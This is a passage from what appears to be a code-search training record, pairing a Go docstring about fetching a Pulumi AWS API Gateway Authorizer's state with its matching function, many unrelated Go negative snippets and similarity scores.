{\n\t\t\t\t\t\tlogger.Error(errors.Unwrap(err))\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\n\t\t\t\t\tgroup, err := store.GetGroupById(id)\n\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tlogger.Error(errors.Unwrap(err))\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\n\t\t\t\t\treturn Printed(group)\n\t\t\t\t},\n\t\t\t},\n\t\t\t{\n\t\t\t\tName: \"group:create\",\n\t\t\t\tFlags: []cli.Flag{\n\t\t\t\t\tcli.StringFlag{Name: \"Name\", Destination: &groupName, Required: true},\n\t\t\t\t},\n\t\t\t\tAction: func(ctx *cli.Context) error {\n\t\t\t\t\tgroup, err := store.CreateGroup(&data.Group{Name: groupName})\n\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tlogger.Error(errors.Unwrap(err))\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\n\t\t\t\t\treturn Printed(group)\n\t\t\t\t},\n\t\t\t},\n\t\t\t{\n\t\t\t\tName: \"group:update\",\n\t\t\t\tFlags: []cli.Flag{\n\t\t\t\t\tcli.StringFlag{Name: \"Name\", Destination: &groupName},\n\t\t\t\t},\n\t\t\t\tAction: func(ctx *cli.Context) error {\n\t\t\t\t\tid, err := getIdArg(ctx)\n\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tlogger.Error(errors.Unwrap(err))\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\n\t\t\t\t\tfields := getPassedFlagNames(ctx)\n\n\t\t\t\t\terr = store.UpdateGroup(id, &data.Group{Name: groupName}, fields...)\n\n\t\t\t\t\treturn err\n\t\t\t\t},\n\t\t\t},\n\t\t\t{\n\t\t\t\tName: \"group:delete\",\n\t\t\t\tAction: func(ctx *cli.Context) error {\n\t\t\t\t\tid, err := getIdArg(ctx)\n\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tlogger.Error(errors.Unwrap(err))\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\n\t\t\t\t\treturn store.DeleteGroup(id)\n\t\t\t\t},\n\t\t\t},\n\t\t\t{\n\t\t\t\tName: \"groups:get\",\n\t\t\t\tFlags: []cli.Flag{\n\t\t\t\t\tcli.Int64Flag{Name: \"UserId\", Destination: &userId, Required: true},\n\t\t\t\t},\n\t\t\t\tAction: func(ctx *cli.Context) error {\n\t\t\t\t\tvar groups []data.Group\n\t\t\t\t\tvar err error\n\n\t\t\t\t\tif ctx.IsSet(\"UserId\") {\n\t\t\t\t\t\tgroups, err = store.GetGroupsByUserId(userId)\n\t\t\t\t\t}\n\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tlogger.Error(errors.Unwrap(err))\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\n\t\t\t\t\treturn Printed(groups)\n\t\t\t\t},\n\t\t\t},\n\t\t\t{\n\t\t\t\tName: \"group:add-user\",\n\t\t\t\tFlags: []cli.Flag{\n\t\t\t\t\tcli.Int64Flag{Name: \"GroupId\", Destination: &groupId, Required: true},\n\t\t\t\t\tcli.Int64Flag{Name: \"UserId\", Destination: &userId, Required: true},\n\t\t\t\t},\n\t\t\t\tAction: func(ctx *cli.Context) error {\n\t\t\t\t\terr := store.LinkGroupToUser(groupId, userId)\n\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tlogger.Error(errors.Unwrap(err))\n\t\t\t\t\t}\n\n\t\t\t\t\treturn err\n\t\t\t\t},\n\t\t\t},\n\t\t\t{\n\t\t\t\tName: \"group:remove-user\",\n\t\t\t\tFlags: []cli.Flag{\n\t\t\t\t\tcli.Int64Flag{Name: \"GroupId\", Destination: &groupId, Required: true},\n\t\t\t\t\tcli.Int64Flag{Name: \"UserId\", Destination: &userId, Required: true},\n\t\t\t\t},\n\t\t\t\tAction: func(ctx *cli.Context) error {\n\t\t\t\t\terr := store.UnlinkGroupFromUser(groupId, userId)\n\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tlogger.Error(errors.Unwrap(err))\n\t\t\t\t\t}\n\n\t\t\t\t\treturn err\n\t\t\t\t},\n\t\t\t},\n\t\t},\n\t}\n}", "func (r *authorsResource) CreateAuthor(request *restful.Request, response *restful.Response) {\n\tcreateAuthorRequest := &model.CreateAuthorRequest{}\n\tif !decodeRequest(request, response, createAuthorRequest) {\n\t\treturn\n\t}\n\n\tctx := context.Background()\n\tres, err := r.service.CreateAuthor(ctx, createAuthorRequest)\n\tif err != nil {\n\t\tencodeErrorWithStatus(response, err, http.StatusBadRequest)\n\t}\n\n\tresponse.WriteHeaderAndEntity(http.StatusCreated, res)\n}", "func NewDomainName(ctx *pulumi.Context,\n\tname string, args *DomainNameArgs, opts ...pulumi.ResourceOpt) (*DomainName, error) {\n\tif args == nil || args.DomainName == nil {\n\t\treturn nil, errors.New(\"missing required argument 'DomainName'\")\n\t}\n\tinputs := make(map[string]interface{})\n\tif args == nil {\n\t\tinputs[\"certificateArn\"] = nil\n\t\tinputs[\"certificateBody\"] = nil\n\t\tinputs[\"certificateChain\"] = nil\n\t\tinputs[\"certificateName\"] = nil\n\t\tinputs[\"certificatePrivateKey\"] = nil\n\t\tinputs[\"domainName\"] = nil\n\t\tinputs[\"endpointConfiguration\"] = nil\n\t\tinputs[\"regionalCertificateArn\"] = nil\n\t\tinputs[\"regionalCertificateName\"] = nil\n\t\tinputs[\"securityPolicy\"] = nil\n\t\tinputs[\"tags\"] = nil\n\t} else {\n\t\tinputs[\"certificateArn\"] = args.CertificateArn\n\t\tinputs[\"certificateBody\"] = args.CertificateBody\n\t\tinputs[\"certificateChain\"] = args.CertificateChain\n\t\tinputs[\"certificateName\"] = args.CertificateName\n\t\tinputs[\"certificatePrivateKey\"] = args.CertificatePrivateKey\n\t\tinputs[\"domainName\"] = args.DomainName\n\t\tinputs[\"endpointConfiguration\"] = args.EndpointConfiguration\n\t\tinputs[\"regionalCertificateArn\"] = args.RegionalCertificateArn\n\t\tinputs[\"regionalCertificateName\"] = args.RegionalCertificateName\n\t\tinputs[\"securityPolicy\"] = args.SecurityPolicy\n\t\tinputs[\"tags\"] = args.Tags\n\t}\n\tinputs[\"arn\"] = nil\n\tinputs[\"certificateUploadDate\"] = nil\n\tinputs[\"cloudfrontDomainName\"] = nil\n\tinputs[\"cloudfrontZoneId\"] = nil\n\tinputs[\"regionalDomainName\"] = nil\n\tinputs[\"regionalZoneId\"] = nil\n\ts, err := ctx.RegisterResource(\"aws:apigateway/domainName:DomainName\", name, true, inputs, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &DomainName{s: s}, nil\n}", "func NewAlias(ctx *pulumi.Context,\n\tname string, args *AliasArgs, opts ...pulumi.ResourceOption) (*Alias, error) {\n\tif args == nil {\n\t\treturn nil, errors.New(\"missing one or more required arguments\")\n\t}\n\n\tif args.EnvironmentId == nil {\n\t\treturn nil, errors.New(\"invalid value for required argument 'EnvironmentId'\")\n\t}\n\tif args.Format == nil {\n\t\treturn nil, errors.New(\"invalid value for required argument 'Format'\")\n\t}\n\tif args.KeystoreId == nil {\n\t\treturn nil, errors.New(\"invalid value for required argument 'KeystoreId'\")\n\t}\n\tif args.OrganizationId == nil {\n\t\treturn nil, errors.New(\"invalid value for required argument 'OrganizationId'\")\n\t}\n\treplaceOnChanges := pulumi.ReplaceOnChanges([]string{\n\t\t\"environmentId\",\n\t\t\"format\",\n\t\t\"keystoreId\",\n\t\t\"organizationId\",\n\t})\n\topts = append(opts, replaceOnChanges)\n\topts = internal.PkgResourceDefaultOpts(opts)\n\tvar resource Alias\n\terr := ctx.RegisterResource(\"google-native:apigee/v1:Alias\", name, args, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func Register(w http.ResponseWriter, r *http.Request) {\n\tlog.Println(\"Register\")\n\tvar dataResource model.RegisterResource\n\t// Decode the incoming User json\n\terr := json.NewDecoder(r.Body).Decode(&dataResource)\n\tif err != nil {\n\t\tcommon.DisplayAppError(\n\t\t\tw,\n\t\t\terr,\n\t\t\t\"Invalid data\",\n\t\t\thttp.StatusInternalServerError,\n\t\t)\n\t\treturn\n\t}\n\n\terr = dataResource.Validate()\n\tif err != nil {\n\t\tcommon.DisplayAppError(\n\t\t\tw,\n\t\t\terr,\n\t\t\t\"Invalid data\",\n\t\t\thttp.StatusBadRequest,\n\t\t)\n\t\treturn\n\t}\n\n\tlog.Println(\"email: \" + dataResource.Email)\n\tcode := utils.RandStringBytesMaskImprSrc(6)\n\tlog.Println(code)\n\n\tdataStore := common.NewDataStore()\n\tdefer dataStore.Close()\n\tcol := dataStore.Collection(\"users\")\n\tuserStore := store.UserStore{C: col}\n\tuser := model.User{\n\t\tEmail: dataResource.Email,\n\t\tActivateCode: code,\n\t\tCreatedDate: time.Now().UTC(),\n\t\tModifiedDate: time.Now().UTC(),\n\t\tRole: \"member\",\n\t}\n\n\t// Insert User document\n\tstatusCode, err := userStore.Create(user, dataResource.Password)\n\n\tresponse := model.ResponseModel{\n\t\tStatusCode: statusCode.V(),\n\t}\n\n\tswitch statusCode {\n\tcase constants.Successful:\n\t\temails.SendVerifyEmail(dataResource.Email, code)\n\t\tresponse.Data = \"\"\n\t\tbreak\n\tcase constants.ExitedEmail:\n\t\tresponse.Error = statusCode.T()\n\t\t//if err != nil {\n\t\t//\tresponse.Error = err.Error()\n\t\t//}\n\t\tbreak\n\tcase constants.Error:\n\t\tresponse.Error = statusCode.T()\n\t\t//if err != nil {\n\t\t//\tresponse.Error = err.Error()\n\t\t//}\n\t\tbreak\n\t}\n\n\tdata, err := json.Marshal(response)\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tw.WriteHeader(http.StatusOK)\n\tw.Write(data)\n}", "func NewGenericAuthorization(methodName string) *GenericAuthorization {\n\treturn &GenericAuthorization{\n\t\tMessageName: methodName,\n\t}\n}", "func NewGenericAuthorization(methodName string) *GenericAuthorization {\n\treturn &GenericAuthorization{\n\t\tMessageName: methodName,\n\t}\n}", "func (rc *ResourceCommand) createCertAuthority(ctx context.Context, client auth.ClientI, raw services.UnknownResource) error {\n\tcertAuthority, err := services.UnmarshalCertAuthority(raw.Raw)\n\tif err != nil {\n\t\treturn trace.Wrap(err)\n\t}\n\tif err := client.UpsertCertAuthority(ctx, certAuthority); err != nil {\n\t\treturn trace.Wrap(err)\n\t}\n\tfmt.Printf(\"certificate authority '%s' has been updated\\n\", certAuthority.GetName())\n\treturn nil\n}", "func Create(w http.ResponseWriter, r *http.Request) {\n\tauthUser, err := auth.GetUserFromJWT(w, r)\n\tif err != nil {\n\t\tresponse.FormatStandardResponse(false, \"error-auth\", \"\", err.Error(), w)\n\t\treturn\n\t}\n\n\tdefer r.Body.Close()\n\n\t// Decode the JSON body\n\tacct := datastore.Account{}\n\terr = json.NewDecoder(r.Body).Decode(&acct)\n\tswitch {\n\t// Check we have some data\n\tcase err == io.EOF:\n\t\tresponse.FormatStandardResponse(false, \"error-account-data\", \"\", \"No account data supplied.\", w)\n\t\treturn\n\t\t// Check for parsing errors\n\tcase err != nil:\n\t\tresponse.FormatStandardResponse(false, \"error-decode-json\", \"\", err.Error(), w)\n\t\treturn\n\t}\n\n\tcreateHandler(w, authUser, false, acct)\n}", "func Create(name string, o *Options) (Provisioner, error) {\n\tif factory, ok := provisioners[name]; ok {\n\t\treturn factory(o), nil\n\t}\n\n\treturn nil, errors.Errorf(\n\t\t\"unsupported provisioner %q, available provisioners: %s\",\n\t\tname,\n\t\treflect.ValueOf(provisioners).MapKeys(),\n\t)\n}" ]
[ "0.52188647", "0.5108134", "0.5086522", "0.5000285", "0.4891315", "0.48323616", "0.47788405", "0.4774721", "0.47684354", "0.47625926", "0.47625926", "0.47579473", "0.47527245", "0.47505093", "0.47407386", "0.47402185", "0.4731808", "0.4727103", "0.47142524", "0.4701625", "0.46722403", "0.46701023", "0.4661496", "0.46591112", "0.46572265", "0.46507105", "0.46476367", "0.4629666", "0.4619488", "0.46128944", "0.46050563", "0.45990053", "0.45705912", "0.45571724", "0.45553574", "0.45548877", "0.45540485", "0.4539204", "0.45323092", "0.45225692", "0.4512628", "0.4504071", "0.4492576", "0.44854504", "0.4482535", "0.44729513", "0.44684324", "0.4457404", "0.4450897", "0.44429222", "0.4427774", "0.4425496", "0.44252706", "0.44239503", "0.4421617", "0.44139683", "0.44105905", "0.44079792", "0.4402684", "0.43916214", "0.43905708", "0.43804392", "0.4365708", "0.43655714", "0.43653122", "0.43636376", "0.43627143", "0.436184", "0.43553138", "0.4350977", "0.43496382", "0.4347013", "0.43392202", "0.43274027", "0.43223056", "0.4318127", "0.43172503", "0.43142554", "0.4312423", "0.43122193", "0.4308865", "0.43013805", "0.42965347", "0.42908892", "0.42862523", "0.42792332", "0.4269439", "0.4269145", "0.42685843", "0.42641184", "0.42640007", "0.42582697", "0.4250456", "0.424786", "0.42438644", "0.42403415", "0.42403415", "0.42383856", "0.42367634", "0.4232333" ]
0.65082943
0
GetAuthorizer gets an existing Authorizer resource's state with the given name, ID, and optional state properties that are used to uniquely qualify the lookup (nil if not required).
func GetAuthorizer(ctx *pulumi.Context, name string, id pulumi.ID, state *AuthorizerState, opts ...pulumi.ResourceOpt) (*Authorizer, error) { inputs := make(map[string]interface{}) if state != nil { inputs["authorizerCredentials"] = state.AuthorizerCredentials inputs["authorizerResultTtlInSeconds"] = state.AuthorizerResultTtlInSeconds inputs["authorizerUri"] = state.AuthorizerUri inputs["identitySource"] = state.IdentitySource inputs["identityValidationExpression"] = state.IdentityValidationExpression inputs["name"] = state.Name inputs["providerArns"] = state.ProviderArns inputs["restApi"] = state.RestApi inputs["type"] = state.Type } s, err := ctx.ReadResource("aws:apigateway/authorizer:Authorizer", name, id, inputs, opts...) if err != nil { return nil, err } return &Authorizer{s: s}, nil }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (c *APIGateway) GetAuthorizer(input *GetAuthorizerInput) (*Authorizer, error) {\n\treq, out := c.GetAuthorizerRequest(input)\n\terr := req.Send()\n\treturn out, err\n}", "func GetAuthorizer(sp *ServicePrincipal, env *azure.Environment) (autorest.Authorizer, error) {\n\toauthConfig, err := adal.NewOAuthConfig(env.ActiveDirectoryEndpoint, sp.TenantID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\ttoken, err := adal.NewServicePrincipalToken(*oauthConfig, sp.ClientID, sp.ClientSecret, env.ServiceManagementEndpoint)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn autorest.NewBearerAuthorizer(token), nil\n}", "func (o *Rule) GetAuthorizer() RuleHandler {\n\tif o == nil || o.Authorizer == nil {\n\t\tvar ret RuleHandler\n\t\treturn ret\n\t}\n\treturn *o.Authorizer\n}", "func (c *APIGateway) GetAuthorizerRequest(input *GetAuthorizerInput) (req *request.Request, output *Authorizer) {\n\top := &request.Operation{\n\t\tName: opGetAuthorizer,\n\t\tHTTPMethod: \"GET\",\n\t\tHTTPPath: \"/restapis/{restapi_id}/authorizers/{authorizer_id}\",\n\t}\n\n\tif input == nil {\n\t\tinput = &GetAuthorizerInput{}\n\t}\n\n\treq = c.newRequest(op, input, output)\n\toutput = &Authorizer{}\n\treq.Data = output\n\treturn\n}", "func (settings EnvironmentSettings) GetAuthorizer() (autorest.Authorizer, error) {\n\t//1.Client Credentials\n\tif c, e := settings.GetClientCredentials(); e == nil {\n\t\tlogger.Instance.Writeln(logger.LogInfo, \"EnvironmentSettings.GetAuthorizer() using client secret credentials\")\n\t\treturn c.Authorizer()\n\t}\n\n\t//2. Client Certificate\n\tif c, e := settings.GetClientCertificate(); e == nil {\n\t\tlogger.Instance.Writeln(logger.LogInfo, \"EnvironmentSettings.GetAuthorizer() using client certificate credentials\")\n\t\treturn c.Authorizer()\n\t}\n\n\t//3. Username Password\n\tif c, e := settings.GetUsernamePassword(); e == nil {\n\t\tlogger.Instance.Writeln(logger.LogInfo, \"EnvironmentSettings.GetAuthorizer() using user name/password credentials\")\n\t\treturn c.Authorizer()\n\t}\n\n\t// 4. MSI\n\tif !adal.MSIAvailable(context.Background(), nil) {\n\t\treturn nil, errors.New(\"MSI not available\")\n\t}\n\tlogger.Instance.Writeln(logger.LogInfo, \"EnvironmentSettings.GetAuthorizer() using MSI authentication\")\n\treturn settings.GetMSI().Authorizer()\n}", "func (settings FileSettings) GetAuthorizer(resourceBaseURI string) (autorest.Authorizer, error) {\n\tif resourceBaseURI == \"\" {\n\t\tresourceBaseURI = azure.PublicCloud.ServiceManagementEndpoint\n\t}\n\tif a, err := settings.ClientCredentialsAuthorizer(resourceBaseURI); err == nil {\n\t\treturn a, err\n\t}\n\tif a, err := settings.ClientCertificateAuthorizer(resourceBaseURI); err == nil {\n\t\treturn a, err\n\t}\n\treturn nil, errors.New(\"auth file missing client and certificate credentials\")\n}", "func getAuthorizerFrom(values map[string]string) (autorest.Authorizer, error) {\n\ts, err := getSettingsFrom(values)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\ta, err := s.GetAuthorizer()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn a, nil\n}", "func (o *Rule) GetAuthorizerOk() (*RuleHandler, bool) {\n\tif o == nil || o.Authorizer == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Authorizer, true\n}", "func GetGraphAuthorizer(creds config.Credentials) (autorest.Authorizer, error) {\n\tif graphAuthorizer != nil {\n\t\treturn graphAuthorizer, nil\n\t}\n\n\tvar a autorest.Authorizer\n\tvar err error\n\n\ta, err = getAuthorizerForResource(config.Environment().GraphEndpoint, creds)\n\n\tif err == nil {\n\t\t// cache\n\t\tgraphAuthorizer = a\n\t} else {\n\t\tgraphAuthorizer = nil\n\t}\n\n\treturn graphAuthorizer, err\n}", "func NewAuthorizer(ctx *pulumi.Context,\n\tname string, args *AuthorizerArgs, opts ...pulumi.ResourceOpt) (*Authorizer, error) {\n\tif args == nil || args.RestApi == nil {\n\t\treturn nil, errors.New(\"missing required argument 'RestApi'\")\n\t}\n\tinputs := make(map[string]interface{})\n\tif args == nil {\n\t\tinputs[\"authorizerCredentials\"] = nil\n\t\tinputs[\"authorizerResultTtlInSeconds\"] = nil\n\t\tinputs[\"authorizerUri\"] = nil\n\t\tinputs[\"identitySource\"] = nil\n\t\tinputs[\"identityValidationExpression\"] = nil\n\t\tinputs[\"name\"] = nil\n\t\tinputs[\"providerArns\"] = nil\n\t\tinputs[\"restApi\"] = nil\n\t\tinputs[\"type\"] = nil\n\t} else {\n\t\tinputs[\"authorizerCredentials\"] = args.AuthorizerCredentials\n\t\tinputs[\"authorizerResultTtlInSeconds\"] = args.AuthorizerResultTtlInSeconds\n\t\tinputs[\"authorizerUri\"] = args.AuthorizerUri\n\t\tinputs[\"identitySource\"] = args.IdentitySource\n\t\tinputs[\"identityValidationExpression\"] = args.IdentityValidationExpression\n\t\tinputs[\"name\"] = args.Name\n\t\tinputs[\"providerArns\"] = args.ProviderArns\n\t\tinputs[\"restApi\"] = args.RestApi\n\t\tinputs[\"type\"] = args.Type\n\t}\n\ts, err := ctx.RegisterResource(\"aws:apigateway/authorizer:Authorizer\", name, true, inputs, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &Authorizer{s: s}, nil\n}", "func GetKeyvaultAuthorizer(creds config.Credentials) (autorest.Authorizer, error) {\n\tif keyvaultAuthorizer != nil {\n\t\treturn keyvaultAuthorizer, nil\n\t}\n\n\t// BUG: default value for KeyVaultEndpoint is wrong\n\tvaultEndpoint := strings.TrimSuffix(config.Environment().KeyVaultEndpoint, \"/\")\n\t// BUG: alternateEndpoint replaces other endpoints in the configs below\n\talternateEndpoint, _ := url.Parse(\n\t\t\"https://login.windows.net/\" + creds.TenantID() + \"/oauth2/token\")\n\n\tvar a autorest.Authorizer\n\tvar err error\n\n\tswitch grantType(creds) {\n\tcase OAuthGrantTypeServicePrincipal:\n\t\toauthconfig, err := adal.NewOAuthConfig(\n\t\t\tconfig.Environment().ActiveDirectoryEndpoint, creds.TenantID())\n\t\tif err != nil {\n\t\t\treturn a, err\n\t\t}\n\t\toauthconfig.AuthorizeEndpoint = *alternateEndpoint\n\n\t\ttoken, err := adal.NewServicePrincipalToken(\n\t\t\t*oauthconfig, creds.ClientID(), creds.ClientSecret(), vaultEndpoint)\n\t\tif err != nil {\n\t\t\treturn a, err\n\t\t}\n\n\t\ta = autorest.NewBearerAuthorizer(token)\n\n\tcase OAuthGrantTypeManagedIdentity:\n\t\tMIEndpoint, err := adal.GetMSIVMEndpoint()\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\ttoken, err := adal.NewServicePrincipalTokenFromMSI(MIEndpoint, vaultEndpoint)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\ta = autorest.NewBearerAuthorizer(token)\n\n\tcase OAuthGrantTypeDeviceFlow:\n\t\t// TODO: Remove this - it's an interactive authentication\n\t\t// method and doesn't make sense in an operator. Maybe it was\n\t\t// useful for early testing?\n\t\tdeviceConfig := auth.NewDeviceFlowConfig(creds.ClientID(), creds.TenantID())\n\t\tdeviceConfig.Resource = vaultEndpoint\n\t\tdeviceConfig.AADEndpoint = alternateEndpoint.String()\n\t\ta, err = deviceConfig.Authorizer()\n\tdefault:\n\t\treturn a, fmt.Errorf(\"invalid grant type specified\")\n\t}\n\n\tif err == nil {\n\t\tkeyvaultAuthorizer = a\n\t} else {\n\t\tkeyvaultAuthorizer = nil\n\t}\n\n\treturn keyvaultAuthorizer, err\n}", "func New() *Authorizer {\n\treturn &Authorizer{\n\t\troles: map[string]Role{},\n\t\trolebindings: map[string]RoleBinding{},\n\t}\n}", "func (i *Influx) RetrieveAuthorization(authID string) (auth *protocol.Authorization, err error) {\n\tres, err := i.HTTPInstance.Get(context.TODO(), i.HTTPClient, i.GetBasicURL()+\"/authorizations\", map[string]string{\n\t\t\"authID\": authID,\n\t}, nil)\n\n\terr = json.Unmarshal(res, &auth)\n\n\treturn\n}", "func (c Client) authorizer() Authorizer {\n\tif c.Authorizer == nil {\n\t\treturn NullAuthorizer{}\n\t}\n\treturn c.Authorizer\n}", "func (a Author) Get(cfg *config.Config, id string) (Author, error) {\n\tvar author Author\n\tsession := cfg.Session.Copy()\n\tif err := cfg.Database.C(AuthorCollection).Find(bson.M{\"_id\": id}).One(&author); err != nil {\n\t\treturn author, err\n\t}\n\tdefer session.Close()\n\treturn author, nil\n}", "func (c *Cfg) Authorizer(resource string) autorest.Authorizer {\n\tc.mu.Lock()\n\tdefer c.mu.Unlock()\n\tauthz := c.authz[resource]\n\tif authz == nil {\n\t\tauthz = c.newAuthz(resource)\n\t\tif c.authz == nil {\n\t\t\tc.authz = make(map[string]autorest.Authorizer)\n\t\t}\n\t\tc.authz[resource] = authz\n\t}\n\treturn authz\n}", "func (roles *RoleProvider) Get(name string) (*idam.Role, error) {\n\troles.lock.RLock()\n\tdefer roles.lock.RUnlock()\n\n\tr, ok := roles.getRole(name)\n\tif !ok {\n\t\treturn nil, idam.ErrUnknownRole\n\t}\n\n\treturn copyRole(r), nil\n}", "func GetAuthorizationRule(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *AuthorizationRuleState, opts ...pulumi.ResourceOption) (*AuthorizationRule, error) {\n\tvar resource AuthorizationRule\n\terr := ctx.ReadResource(\"aws:ec2clientvpn/authorizationRule:AuthorizationRule\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func GetAuthor(w http.ResponseWriter, r *http.Request) {\n\tfmt.Println(\"Endpoint Hit: return single author\")\n\tvars := mux.Vars(r)\n\tid, _ := strconv.Atoi(vars[\"id\"])\n\n\tvar author models.Author\n\tresult := DB.First(&author, id)\n\tif result.Error != nil {\n\t\tresponses.RespondWithError(w, http.StatusBadRequest, result.Error)\n\t\treturn\n\t}\n\n\tresponses.RespondWithJSON(w, http.StatusOK, author)\n}", "func GetAuthorization(req *http.Request, auths []*Authorization) *Authorization {\n\tfor _, auth := range auths {\n\t\tif auth.Applies(req) {\n\t\t\treturn auth\n\t\t}\n\t}\n\treturn nil\n}", "func GetResourceManagementAuthorizer(creds config.Credentials) (autorest.Authorizer, error) {\n\tif armAuthorizer != nil {\n\t\treturn armAuthorizer, nil\n\t}\n\n\tvar a autorest.Authorizer\n\tvar err error\n\n\ta, err = getAuthorizerForResource(config.Environment().ResourceManagerEndpoint, creds)\n\n\tif err == nil {\n\t\t// cache\n\t\tarmAuthorizer = a\n\t} else {\n\t\t// clear cache\n\t\tarmAuthorizer = nil\n\t}\n\treturn armAuthorizer, err\n}", "func GetAnalyzer(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *AnalyzerState, opts ...pulumi.ResourceOption) (*Analyzer, error) {\n\tvar resource Analyzer\n\terr := ctx.ReadResource(\"aws:accessanalyzer/analyzer:Analyzer\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func (this *BaseHandler) Authorizer(key string) string {\n\tvalue, ok := this.RequestVO.Request.RequestContext.Authorizer[key].(string)\n\tif ok {\n\t\treturn value\n\t}\n\tlogs.Error(\"BaseHandler : Authorizer : unable to get \", key, ok, this.RequestVO.Request.RequestContext.Authorizer)\n\treturn \"\"\n}", "func GetAssociation(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *AssociationState, opts ...pulumi.ResourceOption) (*Association, error) {\n\tvar resource Association\n\terr := ctx.ReadResource(\"aws:licensemanager/association:Association\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func ExampleAuthorizationsClient_Get() {\n\tcred, err := azidentity.NewDefaultAzureCredential(nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to obtain a credential: %v\", err)\n\t}\n\tctx := context.Background()\n\tclientFactory, err := armavs.NewClientFactory(\"<subscription-id>\", cred, nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to create client: %v\", err)\n\t}\n\tres, err := clientFactory.NewAuthorizationsClient().Get(ctx, \"group1\", \"cloud1\", \"authorization1\", nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to finish the request: %v\", err)\n\t}\n\t// You could use response here. We use blank identifier for just demo purposes.\n\t_ = res\n\t// If the HTTP response code is 200 as defined in example definition, your response structure would look as follows. Please pay attention that all the values in the output are fake values for just demo purposes.\n\t// res.ExpressRouteAuthorization = armavs.ExpressRouteAuthorization{\n\t// \tName: to.Ptr(\"authorization1\"),\n\t// \tType: to.Ptr(\"Microsoft.AVS/privateClouds/authorizations\"),\n\t// \tID: to.Ptr(\"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.AVS/privateClouds/cloud1/authorizations/authorization1\"),\n\t// \tProperties: &armavs.ExpressRouteAuthorizationProperties{\n\t// \t\tExpressRouteAuthorizationID: to.Ptr(\"/subscriptions/5206f269-120b-41ef-a95b-0dce7109de61/resourceGroups/tnt34-cust-mockp02-spearj2dev/providers/Microsoft.Network/expressroutecircuits/tnt34-cust-mockp02-spearj2dev-er/authorizations/myauth\"),\n\t// \t\tExpressRouteAuthorizationKey: to.Ptr(\"37b0db3b-3b17-4c7b-bf76-bf13b01bcadc\"),\n\t// \t\tExpressRouteID: to.Ptr(\"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/tnt13-41a90db2-9d5e-4bd5-a77a-5ce7b58213d6-eastus2/providers/Microsoft.Network/expressroutecircuits/tnt13-41a90db2-9d5e-4bd5-a77a-5ce7b58213d6-eastus2-xconnect\"),\n\t// \t\tProvisioningState: to.Ptr(armavs.ExpressRouteAuthorizationProvisioningStateSucceeded),\n\t// \t},\n\t// }\n}", "func GetCreator(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *CreatorState, opts ...pulumi.ResourceOption) (*Creator, error) {\n\tvar resource Creator\n\terr := ctx.ReadResource(\"azure-nextgen:maps/v20200201preview:Creator\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func (o *ShortenerAPI) Authorizer() runtime.Authorizer {\n\n\treturn o.APIAuthorizer\n\n}", "func GetBatchAuthorizer(creds config.Credentials) (autorest.Authorizer, error) {\n\tif batchAuthorizer != nil {\n\t\treturn batchAuthorizer, nil\n\t}\n\n\tvar a autorest.Authorizer\n\tvar err error\n\n\ta, err = getAuthorizerForResource(config.Environment().BatchManagementEndpoint, creds)\n\n\tif err == nil {\n\t\t// cache\n\t\tbatchAuthorizer = a\n\t} else {\n\t\t// clear cache\n\t\tbatchAuthorizer = nil\n\t}\n\n\treturn batchAuthorizer, err\n}", "func (o *CredentialProviderAPI) Authorizer() runtime.Authorizer {\n\n\treturn nil\n\n}", "func Authorizer(ctx workflow.Context, evt events.APIGatewayCustomAuthorizerRequest) (err error) {\n\tauthService := new(services.AuthService)\n\tres, err := authService.GetAuthorizerResponse(evt)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tctx.SetRawResponse(res)\n\treturn nil\n}", "func (c APIClient) GetAuthorization(ctx context.Context, keyID, committerEmail string) (*Authorization, error) {\n\tu, err := url.Parse(c.APIBaseURL)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"invalid base url: %w\", err)\n\t}\n\n\tu.Path = path.Join(u.Path, \"v0\", \"gpg\", \"key\", \"authorization\", \"git-commit-signing\")\n\n\tq := u.Query()\n\tq.Set(\"key_id\", keyID)\n\tq.Set(\"committer_email\", committerEmail)\n\tu.RawQuery = q.Encode()\n\n\treq, err := http.NewRequestWithContext(ctx, http.MethodGet, u.String(), nil)\n\tif err != 